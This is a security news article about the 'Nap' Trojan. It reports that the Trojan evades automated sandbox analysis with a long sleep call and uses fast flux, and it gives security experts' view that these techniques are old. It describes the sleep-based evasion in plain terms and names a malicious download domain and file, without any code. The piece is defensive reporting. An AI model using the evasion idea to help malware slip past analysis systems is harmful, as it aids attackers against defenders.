'Sleeper' malware like Nap Trojan nothing new

Some malware designers hope to catch their victims unaware, or "sleeping." The makers of the Trojan Nap hope to snare them by having their creation go to sleep itself.

But everal security experts say that is nothing new. They criticized a blog post earlier this week by FireEye security researchers Abhishek Singh and Ali Islam, who said they had discovered "a stealthy malware that employs extended sleep calls to evade automated analysis systems (AAS) capturing its behavior."

They said Trojan Nap also uses "fast flux technique" to hide the identity of the attackers, which is similar to the behavior of the malware used to attack The New York Times. In that case, a university computer was manipulated to use different IP addresses from around the world, making it more difficult to find the correct one and block the source of the attack or even identify a clear pattern of malicious activity.

"Botnets have been using fluxing techniques for years in order to evade statically compiled black lists," said Manos Antonakakis, senior director of research at Damballa Labs."Also, anti-VM analysis techniques are a common phenomenon in the current malware landscape. [And] evading signature and dynamic analysis systems is not particularly hard at this point."

Antonakakis was also critical of the comparison to the attack onThe Times without first providing explicit and extensive forensic evidence. "It's irresponsible, it creates problems for the global security community and makes the future data sharing efforts between security companies harder, if not impossible," he said.

The Trojan Nap is " a commodity botnet -- the malware is not overly sophisticated," he added.

Amrit Williams, CTO at Lancope, said, "Malware using automated analysis and network evasion techniques isn't new or even that rare. Zeus, which was continually evolving, used several techniques to evade monitoring tools, including the Windows firewall."

Singh and Islam did call the Trojan Nap a "classic technique used to stay under the radar of an automated analysis system." And Singh told CSO Online on Wednesday that, like others, "we have been observing extended sleep calls in other malwares also for quite some time."

They reported that after the malicious code gets executed, it sends an HTTP request to the domain "wowrizep.ru" requesting the file "newbos2.exe."

It is then programmed to take a 600,000 millisecond, or 10-minute, timeout. "Since automated analysis systems are configured to execute a sample within a specified time frame, by executing a sleep call with a long timeout, Nap can prevent an automated analysis system from capturing its malicious behavior," Singh and Islam wrote.

[Bill Brenner in the Salted Hash blog: 40 years after the first computer virus]

Depite being a classic technique, the automated analysis systems industry has not developed ways to sniff it out.

Bogdan "Bob" Botezatu, a senior e-threat analyst at Bitdefender, says it is a matter of efficiency. Antivirus emulators and automated analysis systems are designed not to waste CPU cycles and resources, he said. "They are designed to handle tens of thousands of possibly malicious samples, and can't afford to wait on a file that apparently does nothing."

So it is not something that will change overnight. "There is no reasonable way to circumvent this unless the automated system is willing to trade efficiency," Botezatu said.

But Singh said he thinks automated systems "should have evolved to ensure that malware should not be able to use extended sleep calls to bypass capturing of its behavior."

Antonakakis said antivirus product makers should be up to speed. "[They] should be paying attention to the network behavior and the ecosystem around Internet threats," he said. "Binaries employ several different obfuscation techniques, so tracking them in the context of botnets is extremely hard."

However, he said that, based on previous analysis of this malware from the community and according to his company's own datasets, they believe that this this threat is related to the Kelihos botnet. "We believe that the downloader being used is just one component in this campaign," Antonakakis said.

Singh said automated systems are still the fastest way to determine the nature of a file. "But besides capturing the behavior, automated analysis systems should have techniques such that they cannot be evaded," he said.

Antonakakis said: "Let's put it another way: If you rely on seeing the malware, you have already lost the war."

Read more about malware/cybercrime in CSOonline's Malware/Cybercrime section.

Join the CSO newsletter!

Error: Please check your email address.

Tags Nap TrojanapplicationsData Protection | Malwaresleeper malwarelegalsoftwaredata protectioncybercrime

More about AASBillCSOFireEyeLancope

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by Taylor Armerding

Latest Videos

  • 150x50

    CSO Webinar: Will your data protection strategy be enough when disaster strikes?

    Speakers: - Paul O’Connor, Engagement leader - Performance Audit Group, Victorian Auditor-General’s Office (VAGO) - Nigel Phair, Managing Director, Centre for Internet Safety - Joshua Stenhouse, Technical Evangelist, Zerto - Anthony Caruana, CSO MC & Moderator

    Play Video

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

More videos

Blog Posts

Market Place